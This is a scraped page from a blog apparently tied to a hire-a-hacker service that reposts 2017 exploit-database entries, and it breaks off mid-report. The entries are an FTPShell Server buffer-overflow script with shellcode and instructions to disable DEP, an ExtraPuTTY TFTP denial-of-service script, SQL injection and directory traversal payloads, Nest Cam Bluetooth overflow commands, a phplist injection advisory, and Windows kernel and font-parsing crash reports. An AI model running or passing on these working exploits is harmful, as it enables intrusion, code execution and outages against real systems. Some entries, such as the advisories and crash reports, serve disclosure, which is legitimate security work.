Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863529580

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
print '''
 
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com   # 
                ##############################################
 
# Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day 
# Date: 2017.03.19
# Exploit Author: Greg Priest
# Version: FTPShell Server 6.56
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

overflow = "A" * 1249
jmp_esp = "\xC8\x28\x3C\x76"
nop = "\x90" * 10
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")

evilstring = overflow+jmp_esp+nop+shellcode
 
 
file = open ('Ev1lstr1ng.txt', "w")
file.write(evilstring)
file.close

print '''
Instruction how to use it:
-DEP turn off: C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
1)Manage FTP Account-->
2)Change pass Ev1lstr1ng.txt -->
3)Do you really change...? --> click NO!!
Succesfully Exploitation!!
 
'''
HireHackking 
# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
# Date: 2017-03-19
# Exploit Author: malwrforensics
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
# Version: 1.0
# Tested on: Windows

Exploiting this issue will allow an attacker to view arbitrary files
within the context of the web server.

Example:
Assuming the root folder is c:\<app_folder>\<html_folder>

http://<server>/..%5c..%5c/windows/win.ini
HireHackking 
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec            
 


Vendor:
==================
www.extraputty.com



Product:
======================
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773

Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91

ExtraPuTTY is a fork from 0.67 version of PuTTY.
ExtraPuTTY has all the features from the original soft and adds others.

Below a short list of the principal features (see all features):
DLL frontend
TestStand API ( LabWindows ,TestStand 2012)
timestamp
StatusBar
Scripting a session with lua 5.3.
Automatic sequencing of commands.
Shortcuts for pre-defined commands.
Keyboard shortcuts for pre-defined command
Portability (use of directories structure)
Integrates FTP,TFTP,SCP,SFTP,Ymodem,Xmodem transfert protocols
Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change putty settings during session
PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty windows


Vulnerability Type:
=======================
TFTP Denial of Service



CVE Reference:
==============
CVE-2017-7183



Security Issue:
================
TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP
Read/Write TFTP protocol request packets. 

Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, run below Python exploit.

Then, BOOM

(100c.30c): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for kernel32.dll - 
eax=00000000 ebx=0929ee98 ecx=00000174 edx=7efefeff esi=00000002 edi=00000000
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!ZwWaitForMultipleObjects+0x15:



Exploit/POC:
=============
import socket

print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"

TARGET=raw_input("[IP]>")
TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH="A"*2000                     
PORT = 69

if TYPE==1:
    PAYLOAD = "\x00\x01"                                     
    PAYLOAD += CRASH + "\x00"   
    PAYLOAD += "netascii\x00"                                
elif TYPE==2:
    PAYLOAD = "\x00\x02"                                     
    PAYLOAD += CRASH + "\x00"   
    PAYLOAD += "netascii\x00"                                

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto("\x00\x01\TEST\x00\netascii\x00", (TARGET, PORT))
    recv = s.recvfrom(255)
    if recv != None:
        print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
        s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
        print 'Server not avail, try later'
s.close()





Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
===============================
Vendor Notification:  No reply
March 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# # # # #
# Exploit Title: Joomla! Component JooCart (Joomla OpenCart Integration) v2.x - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=4478
# Demo: http://demo.soft-php.com
# Version: 2.x
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_opencart&route=product/product&product_id=[SQL]
# # # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component jCart for OpenCart v2.0 - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Demo: http://demos.soft-php.com/jcart/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jcart&route=product/product&product_id=[SQL]
# # # # #
HireHackking 
# Exploit Title: Google Nest Cam - Multiple Buffer Overflow Conditions Over Bluetooth LE
# Reported to Google: October 26, 2016

# Public Disclosure: March 17, 2017
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: https://nest.com/
# Affected: Dropcam, Dropcam Pro, Nest Cam Indoor/Outdoor models

# Tested Version: 5.2.1

# Fixed Version: TBD
# https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md


==Bluetooth (BLE) based Buffer Overflow via SSID parameter==

1. Summary


It's possible to trigger a buffer overflow condition when setting the SSID parameter on the camera. The attacker must be in bluetooth range at any time during the cameras powered on state. Bluetooth is never disabled even after initial setup.

2. Proof of Concept


anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I

[18:B4:30:5D:00:B8][LE]> connect

Attempting to connect to 18:B4:30:5D:00:B8

Connection successful

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b

Characteristic value was written successfully

Characteristic value was written successfully

[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

3. Details 

The payload attempts to set an SSID with a length of 1 byte and sends 16.
SequenceNum=3a + Type=0312 + Length=01 + Value=AA*16

4. Result


Crash and reboot back to operational state


==Bluetooth (BLE) based Buffer Overflow via Encrypted Password parameter==

1. Summary


It's possible to trigger a buffer overflow condition when setting the encrypted password parameter on the camera. The attacker must be in bluetooth range at any time during the cameras powered on state. Bluetooth is never disabled even after initial setup.

2. Proof of Concept


anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I

[18:B4:30:5D:00:B8][LE]> connect

Attempting to connect to 18:B4:30:5D:00:B8

Connection successful

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA

[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b

Characteristic value was written successfully

Characteristic value was written successfully

[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

3. Details


The payload attempts to set the encrypted wifi password with a length of 1 byte and sends 3.
SequenceNum=3a + Type=0312 + Length=0b + ssidVal=506574536d6172742d356e + type=1a + length=01 + encPass=AA*3
HireHackking 
1. Introduction

Affected Product:	phplist 3.2.6
Fixed in:	3.3.1
Fixed Version Link:	https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:	https://www.phplist.org/
Vulnerability Type:	SQL Injection
Remote Exploitable:	Yes
Reported to vendor:	01/10/2017
Disclosed to public:	02/20/2017
Release mode:	Coordinated Release
CVE:	n/a (not requested)
Credits	Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to SQL injection.

The application contains two SQL injections, one of which is in the administration area and one which requires no credentials. Additionally, at least one query is not properly protected against injections. Furthermore, a query in the administration area discloses some information on the password hashes of users.


3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom magic quotes function which applies addslashes to all input values and a function which applies htmlspecialchars to all inputs. Additionally, some input values are cast to integers to prevent injections. addslashes protects against injections into arguments which are placed into single quotes, while htmlspecialchars protects against injections into double quotes.

It should be noted that neither addslashes nor htmlspecialchars are recommended to prevent SQL Injection.

The update functionality is vulnerable to SQL Injection as it uses the key of POST data, while only values of POST data are escaped via addslashes, but not keys.

Proof of Concept:

POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=foo%40example.com
HTTP/1.1
Host: localhost
Connection: close
Content-Length: 209
       
email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error messages are displayed to the user. If this is not the case, other techniques can be used to extract data from the database.

Code:

/lists/admin/subscribelib2.php
$lists = '';
if (is_array($_POST['list'])) {
	while (list($key, $val) = each($_POST['list'])) {
    	if ($val == 'signup') {
        	$result = Sql_query("replace into
			{$GLOBALS['tables']['listuser']} (userid,listid,entered)
			values($userid,$key,now())");
			# $lists .= "  * ".$_POST["listname"][$key]."\n";
		}
	}
}


SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL injection. The injection takes place into an UPDATE, so the easiest way to extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this issue.

Proof of Concept:

POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1
Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12
Connection: close
Content-Length: 323
       
formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling&htmlformatted=auto&sendformat=HTML"
or extractvalue(1,version()) -- -
&id=2&status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

// /lists/admin/send_core.php:198
$result = Sql_Query(
	sprintf('update %s  set
		subject = "%s", fromfield = "%s", tofield = "%s",
		replyto ="%s", embargo = "%s", repeatinterval = "%s",
		repeatuntil = "%s",
		message = "%s", textmessage = "%s", footer = "%s", status = "%s",
		htmlformatted = "%s", sendformat  = "%s", template  =  "%s"
		where id = %d',
		$tables['message'],
		sql_escape(strip_tags($messagedata['campaigntitle'])),
		/* we store the title in the subject field. Better would
		be to rename the DB column, but this will do for now */
		sql_escape($messagedata['fromfield']),
		sql_escape($messagedata['tofield']),
		sql_escape($messagedata['replyto']),
		sprintf('d-d-d d:d',
			$messagedata['embargo']['year'],
			$messagedata['embargo']['month'], $messagedata['embargo']['day'],
			$messagedata['embargo']['hour'],
			$messagedata['embargo']['minute']), 
		$messagedata['repeatinterval'],
		sprintf('d-d-d d:d',
			$messagedata['repeatuntil']['year'],
			$messagedata['repeatuntil']['month'],
			$messagedata['repeatuntil']['day'],
			$messagedata['repeatuntil']['hour'],
			$messagedata['repeatuntil']['minute']),
		sql_escape($messagedata['message']),
		sql_escape($messagedata['textmessage']),
		sql_escape($messagedata['footer']),
		sql_escape($messagedata['status']), $htmlformatted ? '1'
		: '0', $messagedata['sendformat'],
		sql_escape($messagedata['template']), $id
	)
);

Sort By: Password (Admin)

CVSS: Low 2.2 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N

When viewing users, the sortby parameter can be used to sort the list. The drop down list allows sorting by email, dates, and so on. All non-word characters are removed, but there are no further checks.

It is possible to gather some information on the password of users via this parameter, as it is possible to set it to sort by password.

By repeatedly changing the password of an existing user, the characters of a password hash could be bruteforced by looking at the position of the user the attacker controls.

An account with the right to view users is required to exploit this issue.

Proof of Concept:

http://localhost//lists/admin/?page=users&start=0&find=&findby=&sortby=password&sortorder=desc&change=Go&id=0&find=&findby=email


Insufficient Protection against SQL Injection

CVSS: n/a

When subscribing a user, metadata is saved in the database. When saving this data in the database, it is neither properly escaped nor are prepared statements used, but the input is HTML encoded.

Because of this, an unauthenticated user has control over part of the query.

This issue is not currently exploitable, but may be exploitable if changes are made to the query. The approach of HTML encoding instead of using prepared statements to defend against SQL injection is also more error prone and may result in further queries which are vulnerable.

A user can create a database error with the following request:

POST /lists/index.php?p=subscribe&id=a\ HTTP/1.1
Host: localhost
Cookie: PHPSESSID=8h5fh18cqe41a2l1t6224tf9v4
Connection: close
           
formtoken=5bf7774ff0f2e396081dc1478cd92201&makeconfirmed=0&email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2%5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&subscribe=Subscribe+to+the+selected+newsletters%27


The resulting query is:

insert into phplist_user_user_history (ip,userid,date,summary,detail,systeminfo)
values("127.0.0.1",2,now(),"Re-Subscription","[...]","
    HTTP_USER_AGENT = [...]
    REQUEST_URI = /lists/index.php?p=subscribe&id=a\")

It can be seen that the slash in the request escapes the quote of the query which causes an error.


4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:

https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download

Please note that a newer version might already be available.


5. Report Timeline

01/10/2017	Informed Vendor about Issue
01/16/2017	Vendor confirms
02/15/2017	Asked Vendor to confirm that new release fixes issues
02/15/2017	Vendor confirms
02/20/2017	Disclosed to public
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=993

We have encountered Windows kernel crashes in the internal nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages functions while loading corrupted registry hive files. We believe both crashes to be caused by the same bug. Examples of crash log excerpts generated after triggering the bug are shown below:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: a2b23004, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 817f7f04, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

[...]

STACK_TEXT:  
a3c0b70c 818b68d0 a06529c8 a0652fd8 a06529c8 nt!HvpGetBinMemAlloc+0x8
a3c0b73c 817f113e 00000001 80000580 80000578 nt!HvFreeHive+0x11c
a3c0b798 817c4fac a3c0b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a3c0b85c 817c5d91 a3c0bbb8 00000000 a3c0b9f4 nt!CmpInitHiveFromFile+0x1be
a3c0b9c0 817cdaba a3c0bbb8 a3c0ba88 a3c0ba0c nt!CmpCmdHiveOpen+0x50
a3c0bacc 817c63c4 a3c0bb90 a3c0bbb8 00000010 nt!CmLoadKey+0x459
a3c0bc0c 8165cdb6 002efa0c 00000000 00000010 nt!NtLoadKeyEx+0x56c
a3c0bc0c 77796c74 002efa0c 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002efa74 00000000 00000000 00000000 00000000 0x77796c74
---

and

---
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000022, 
Arg2: a9c14000
Arg3: 00000001
Arg4: 00000000

[...]

STACK_TEXT:  
a353b688 81760bf9 a9c14000 a353b6c0 a353b6b4 nt!ExpFindAndRemoveTagBigPages+0x1fd
a353b6f8 8184d349 a9c14000 00000000 a353b73c nt!ExFreePoolWithTag+0x13f
a353b708 818d48d9 a9c14000 00001000 a87bcfd8 nt!CmpFree+0x17
a353b73c 8180f13e 00000001 80000560 80000548 nt!HvFreeHive+0x125
a353b798 817e2fac a353b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a353b85c 817e3d91 a353bbb8 00000000 a353b9f4 nt!CmpInitHiveFromFile+0x1be
a353b9c0 817ebaba a353bbb8 a353ba88 a353ba0c nt!CmpCmdHiveOpen+0x50
a353bacc 817e43c4 a353bb90 a353bbb8 00000010 nt!CmLoadKey+0x459
a353bc0c 8167adb6 002bf614 00000000 00000010 nt!NtLoadKeyEx+0x56c
a353bc0c 77a36c74 002bf614 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002bf67c 00000000 00000000 00000000 00000000 0x77a36c74
---

The issue reproduces on Windows 7 32- and 64-bit, and manifests itself both with and without Special Pools (but it is still advised to have the mechanism enabled). In order to reproduce the problem with the provided samples, it is necessary to load them with a dedicated program which calls the RegLoadAppKey() API.

The root cause of the crashes is unknown. It must be noted that in our test environment, reproduction has been very unreliable: the same hive could crash the system in one run, and then parse fine (or fail with an error) in 10 subsequent runs. In order to facilitate reproduction, I'm providing a high number of testcases which were seen to cause a bugcheck once or more, in hope that at least one of them will also reproduce externally.

################################################################################

On November 29, MSRC let us know that they were unable to reproduce a crash with the provided samples and report, and asked for more information and/or kernel crash dumps.

One day later, we've looked into the bug again and discovered that it wasn't sufficient to just load a single corrupted hive to trigger the bugcheck: instead, it is necessary to sequentially load several corrupted hives from the same path in the filesystem. MSRC confirmed that they could reliably reproduce the problem with this new information.

Since the additional detail is crucial to observe the symptoms of the bug and it was not included in the original report, I'm resetting the "Reported" date to November 30.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41645.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1019

We have encountered a crash in the Windows Uniscribe user-mode library, in the usp10!otlChainRuleSetTable::rule function, while trying to display text using a corrupted TTF font file:

---
(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????

0:000> kb
ChildEBP RetAddr  Args to Child              
0026ec2c 752382f3 0026ecac 00001b9f 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 75231471 42555347 0026f078 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 752335e1 000000e4 0026f078 0026f09c USP10!ApplyLookup+0x261
0026ef4c 7522f29f 42555347 0026f0b4 0026f078 USP10!ApplyFeatures+0x481
0026ef98 7522f710 00000000 09342ffa 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 752213c0 0026f050 0026f088 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 7521548a 0026f35c 0026f388 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 7521253f 0026f35c 0026f388 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 751e5c6f 2d011da2 09316124 09316318 USP10!ShlShape+0x2ef
0026f440 751f167a 2d011da2 09316124 09316318 USP10!ScriptShape+0x15f
0026f4a0 751f2b14 00000000 00000000 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 751f2da2 00000000 00000000 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 751f4339 00000000 0026f520 09316124 USP10!RenderItem+0x22
0026f534 751e7a04 000004a0 00000400 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 76ca5465 2d011da2 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 76ca5172 2d011da2 0026fa1c 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 76ca1410 2d011da2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 763c18b0 2d011da2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0026f708 763c22bf 2d011da2 00000048 00000000 USER32!DT_DrawStr+0x13c
0026f754 763c21f2 2d011da2 0026fa1c 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 763c14d4 2d011da2 00000000 0000000a USER32!DrawTextExWorker+0x255
0026f824 763c2475 2d011da2 0026fa1c ffffffff USER32!DrawTextExW+0x1e
[...]
---

The crash is caused by a single-byte change in a legitimate font file: at offset 0x845A, byte 0x00 is changed to 0xFF. The data region corresponds to the "GSUB" sfnt table. The change causes the otlChainRuleTable::backtrackGlyphCount() function to return an overly large 16-bit integer of 0xED00, which is then used as the number of iterations in a subsequent loop in the otlChainingLookup::apply() function, without prior validation. Increasing (out-of-bounds) indexes are then passed to otlChainRuleSetTable::rule() in the 2nd parameter, and used to address an array of 16-bit indexes. This is where the crash takes place, as the large index eventually starts pointing into the boundary of the last mapped heap memory page.

The 16-bit value being read from outside the allocated buffer is later used as yet another index, used to address some an array in the otlChainRuleTable::otlChainRuleTable() routine. While the function only appears to read from the newly formed pointer at first glance, we are not ruling out the possibility of memory corruption. In a read-only scenario, the issue could be potentially used to disclose sensitive data from the process heap.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with the original and modified TTF files.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41646.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1022

We have encountered a crash in the Windows Uniscribe user-mode library, in the memmove() function called by USP10!otlList::insertAt, while trying to display text using a corrupted font file:

---
(4b44.24a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=093bc154 ebx=0943c104 ecx=00000012 edx=00000000 esi=093bc10c edi=0943c104
eip=76bc9f40 esp=001ee9b4 ebp=001ee9bc iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
msvcrt!memmove+0x5a:
76bc9f40 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr  Args to Child              
001ee9bc 7522e87a 0943c104 093bc10c 00000048 msvcrt!memmove+0x5a
001ee9dc 752358bd 00000002 ffffffff 00000001 USP10!otlList::insertAt+0x3a
001ee9f8 7523a414 001eee10 001eee34 00000002 USP10!InsertGlyphs+0x1d
001eea3c 75239676 001eee10 001eee34 001eed24 USP10!SubstituteNtoM+0x224
001eea7c 75231393 001eee10 001eee34 001eed24 USP10!otlMultiSubstLookup::apply+0xf6
001eeae0 752335e1 00000000 001eee10 001eee34 USP10!ApplyLookup+0x183
001eece4 7522f29f 42555347 001eee4c 001eee10 USP10!ApplyFeatures+0x481
001eed30 7522f710 00000000 093da000 093d9b58 USP10!SubstituteOtlGlyphs+0x1bf
001eed6c 752213c0 001eede8 001eee20 001eee4c USP10!SubstituteOtlChars+0x220
001eefe8 7521548a 001ef0f4 001ef120 001ef108 USP10!HebrewEngineGetGlyphs+0x690
001ef0a8 7521253f 001ef0f4 001ef120 001ef108 USP10!ShapingGetGlyphs+0x36a
001ef190 751e5c6f 86011dce 093b6124 093b6318 USP10!ShlShape+0x2ef
001ef1d4 751f167a 86011dce 093b6124 093b6318 USP10!ScriptShape+0x15f
001ef234 751f2b14 00000000 00000000 001ef2b4 USP10!RenderItemNoFallback+0xfa
001ef260 751f2da2 00000000 00000000 001ef2b4 USP10!RenderItemWithFallback+0x104
001ef284 751f4339 00000000 001ef2b4 093b6124 USP10!RenderItem+0x22
001ef2c8 751e7a04 000004a0 00000400 86011dce USP10!ScriptStringAnalyzeGlyphs+0x1e9
001ef2e0 76ca5465 86011dce 093b6040 0000000a USP10!ScriptStringAnalyse+0x284
001ef32c 76ca5172 86011dce 001ef714 0000000a LPK!LpkStringAnalyse+0xe5
001ef428 76ca1410 86011dce 00000000 00000000 LPK!LpkCharsetDraw+0x332
001ef45c 763c18b0 86011dce 00000000 00000000 LPK!LpkDrawTextEx+0x40
001ef49c 763c22bf 86011dce 00000058 00000000 USER32!DT_DrawStr+0x13c
001ef4e8 763c21f2 86011dce 001ef714 001ef728 USER32!DT_GetLineBreak+0x78
001ef594 763c14d4 86011dce 00000000 0000000a USER32!DrawTextExWorker+0x255
001ef5b8 763c2475 86011dce 001ef714 ffffffff USER32!DrawTextExW+0x1e
001ef5ec 013abcec 86011dce 001ef714 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
093bc10c  00000b45 00010001 00000b46 00010002
093bc11c  00000b47 00010003 00000b48 00010004
093bc12c  00000b49 00010005 00000b4a 00010006
093bc13c  00000b4b 00010007 00000b4c 00010008
093bc14c  00000b4d 00010009 000b0000 67696c63
093bc15c  00000001 000b0000 00000001 000000f8
093bc16c  00000048 001104bd 00010000 00000b26
093bc17c  00010001 00000b27 00010002 00000b28
0:000> dd edi
0943c104  ???????? ???????? ???????? ????????
0943c114  ???????? ???????? ???????? ????????
0943c124  ???????? ???????? ???????? ????????
0943c134  ???????? ???????? ???????? ????????
0943c144  ???????? ???????? ???????? ????????
0943c154  ???????? ???????? ???????? ????????
0943c164  ???????? ???????? ???????? ????????
0943c174  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41647.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1023

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!AssignGlyphTypes function, while trying to display text using a corrupted font file:

---
(58d0.5ae4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0042f2cc ebx=00000001 ecx=00000091 edx=00000091 esi=095c0004 edi=000007e1
eip=75235699 esp=0042ef8c ebp=0042ef98 iopl=0         nv up ei pl nz na po nc
